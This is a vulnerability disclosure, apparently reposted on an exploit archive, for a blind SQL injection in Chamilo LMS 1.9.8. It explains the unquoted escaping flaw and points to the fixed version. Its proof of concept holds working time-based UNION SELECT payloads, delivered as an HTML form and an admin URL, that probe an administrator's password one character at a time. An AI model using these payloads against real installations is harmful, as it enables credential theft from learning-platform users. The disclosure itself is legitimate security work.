Chamilo LMS 1.9.8 Blind SQL Injection

2015.02.10
Credit: Kacper Szurek
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Chamilo LMS 1.9.8 Blind SQL Injection # Date: 06-12-2014 # Software Link: http://www.chamilo.org/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps 1. Description Database::escape_string() function is used to sanitize data but it will work only in two situations: "function_output" or 'function_output'. There is few places where this function is used without quotation marks. http://security.szurek.pl/chamilo-lms-198-blind-sql-injection.html 2. Proof of Concept For this exploit you need teacher privilege (api_is_allowed_to_edit(false, true)) and at least one forum category must exist (get_forum_categories()). <form method="post" action="http://chamilo-url/main/forum/?action=move&content=forum&SubmitForumCategory=1&direction=1&id=0 UNION (SELECT IF(substr(password,1,1) = CHAR(100), SLEEP(5), 0) FROM user WHERE user_id = 1)"> <input type="hidden" name="SubmitForumCategory" value="1"> <input type="submit" value="Hack!"> </form> For second exploit you need administrator privilege (there is no CSRF protection): http://chamilo-url/main/reservation/m_category.php?action=delete&id=0 UNION (SELECT IF(substr(password,1,1) = CHAR(100), SLEEP(5), 0) FROM user WHERE user_id = 1) Those SQL will check if first password character user ID=1 is "d". 3. Solution: Update to version 1.9.10 https://support.chamilo.org/projects/chamilo-18/wiki/Security_issues

References:

https://support.chamilo.org/projects/chamilo-18/wiki/Security_issues


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top